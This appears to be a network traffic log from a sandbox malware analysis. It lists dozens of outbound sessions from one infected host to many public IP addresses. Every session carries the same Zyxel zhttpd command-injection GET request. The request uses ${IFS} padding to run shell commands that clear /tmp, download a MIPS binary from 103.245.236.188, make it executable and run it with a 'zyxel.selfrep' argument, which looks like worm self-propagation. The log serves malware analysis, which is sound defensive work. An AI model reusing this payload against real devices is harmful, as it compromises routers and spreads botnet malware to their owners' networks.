                                                Jan 12, 2024 18:16:18.327625990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3190192.168.2.234049086.7.39.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327685118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3191192.168.2.23566464.70.134.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327712059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192192.168.2.234119674.213.225.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327769995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3193192.168.2.234360824.51.188.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327810049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3194192.168.2.2340884164.73.73.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327833891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3195192.168.2.2333418181.18.225.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327872038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3196192.168.2.234686420.130.237.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327923059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3197192.168.2.2336766149.157.120.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327965975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3198192.168.2.2360924222.115.25.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327997923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3199192.168.2.2339724157.157.19.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328037977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3200192.168.2.235261827.128.3.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328066111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3201192.168.2.2350896155.251.43.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328129053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3202192.168.2.235395890.183.41.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328162909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3203192.168.2.2340780196.192.108.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328193903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3204192.168.2.2350852178.56.255.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328234911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3205192.168.2.233938412.25.82.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328268051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3206192.168.2.234912293.229.123.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328326941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3207192.168.2.2333568193.10.109.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328361988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3208192.168.2.2340876152.167.142.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328421116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3209192.168.2.234511482.95.77.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328454018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3210192.168.2.2355954193.193.170.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328494072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3211192.168.2.235048096.81.92.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328527927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3212192.168.2.2340880203.38.184.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328558922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3213192.168.2.23408381.101.91.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328593969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3214192.168.2.234601888.228.118.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328669071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3215192.168.2.2340178218.194.144.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328712940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3216192.168.2.2349010166.116.5.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328731060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3217192.168.2.2338796144.80.253.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328794956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3218192.168.2.234572218.120.252.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328825951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3219192.168.2.2338694133.128.188.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328866005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3220192.168.2.2355460107.180.3.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328886032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3221192.168.2.2343262171.84.116.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328923941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3222192.168.2.233443853.227.141.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.328978062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3223192.168.2.235111845.45.159.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329004049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3224192.168.2.2333466185.75.121.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329040051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3225192.168.2.235503662.164.210.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329113007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3226192.168.2.233693061.4.46.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329128027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3227192.168.2.2351332140.71.121.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329164028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3228192.168.2.235826875.105.95.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329206944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3229192.168.2.2344458148.200.78.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329237938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3230192.168.2.2358884148.230.166.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329262018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3231192.168.2.2339686125.218.111.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329304934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3232192.168.2.2334820147.191.163.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329351902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3233192.168.2.235217881.234.58.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329396009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3234192.168.2.2349152114.122.225.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329430103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3235192.168.2.2344094113.62.73.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329471111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3236192.168.2.2348144145.140.174.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329514980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3237192.168.2.233969694.200.73.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329545975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3238192.168.2.2355064113.97.18.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329602957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3239192.168.2.233817271.90.14.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329651117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3240192.168.2.234893025.95.115.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329670906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3241192.168.2.2350326152.129.58.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329722881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3242192.168.2.2344068171.220.154.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329754114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3243192.168.2.2345748110.229.238.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329797983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3244192.168.2.23462024.140.210.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329828978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3245192.168.2.234458836.200.202.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329891920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3246192.168.2.2349738188.102.101.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329911947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3247192.168.2.2356108145.130.4.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329924107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3248192.168.2.2338322149.98.58.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.329969883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3249192.168.2.2334154181.123.232.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330038071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3250192.168.2.2344134118.89.170.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330039978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3251192.168.2.2343216148.52.115.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330086946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3252192.168.2.2357784207.189.159.88443
                                                TimestampBytes transferredDirectionData
